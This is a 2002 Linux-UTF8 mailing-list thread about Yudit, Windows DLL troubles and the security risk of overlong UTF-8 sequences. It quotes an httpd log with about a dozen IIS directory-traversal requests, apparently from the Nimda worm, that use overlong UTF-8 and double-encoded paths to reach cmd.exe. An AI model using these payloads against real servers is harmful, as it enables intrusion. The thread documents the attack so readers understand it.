Hi, I mostly recovered my shock :) Most people pointed out that the real juice on my security page was the second example.
http://www.yudit.org/security/ I am telling you - this was a mere luck. We also had a virus attack in the company the previous weeks, and it was a nimda variant. I am not sure I could have reporduced the problem if my friend used Windows at that time - disinfection needs riched20.dll to be replaced. If I were a Windows guy I would experiment with this (*shrug*). One more thing: when I added Arabic and ported Yudit to Windows this richec20.dll misteriously disappeared from my wife's hard disk, and she could not compose any emails. Looking at the web revealed that this is a common problem in Windows - this dll sometimes disappear. What a funny OS Windows is! Sorry for bothering you with Windows things, I just would like to avoid things like this in Linux. Also It would be nice to keep the current warm atmosphere in the mailing list - I really like this list. People say that in some other mailing lists you can give even good reasons and people still do not listen. I don't like that because if you try to solve a problem and you see that even good reasons can not win you feel sad. And for some, if no good reasons can win all that is left is violance. I hate violance. Even not-so-smart people can have good ideas, we need to encourage and embrace them. Cheers gaspar On Fri, 15 Feb 2002, Oyvind A. Holm wrote: > On 2002-02-14 22:50 Markus Kuhn wrote: > > > For those of you still wondering what I was worried about a few years > > ago with regard to overlong UTF-8 sequences, here some extract from > > our httpd log files: > > > > ... > > GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET >/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ >HTTP/1.0 > > GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET >/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ >HTTP/1.0 > > GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0 > > GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ >HTTP/1.0 > > ... > > > > P.S.: Has anyone an idea, which IIS worm performs the above HTTP > > vulnerability tests? Is it one of the later Nimda variants or > > something else? > > Think it is one of the earliest Nimda variants. My access_log and > error_log was flooded with similar false hits. About 190.000 hits like > that in one day. Think it was around 2001-09-19, after some days it > decreased quite rapidly. Filled up my log partition first, though. > Quite annoying. I really wonder how much bandwith resources those worms > throw away. Guess when micro$oft gets this .net thing on track with > their funny protocols things will not actually improve. > > �yvind > > +===================================================================+ > | OpenPGP: 0xAD19826C 2000-01-24 �yvind A. Holm <[EMAIL PROTECTED]> | > | Fingerprint: EAE5 DCA0 0626 5DAA 72F8 0435 2E2B E476 AD19 826C | > +=========== 2 + 2 = 5 for extremely large values of 2. ============+ > > -- > Linux-UTF8: i18n of Linux on all levels > Archive: http://mail.nl.linux.org/linux-utf8/ > > -- Linux-UTF8: i18n of Linux on all levels Archive: http://mail.nl.linux.org/linux-utf8/
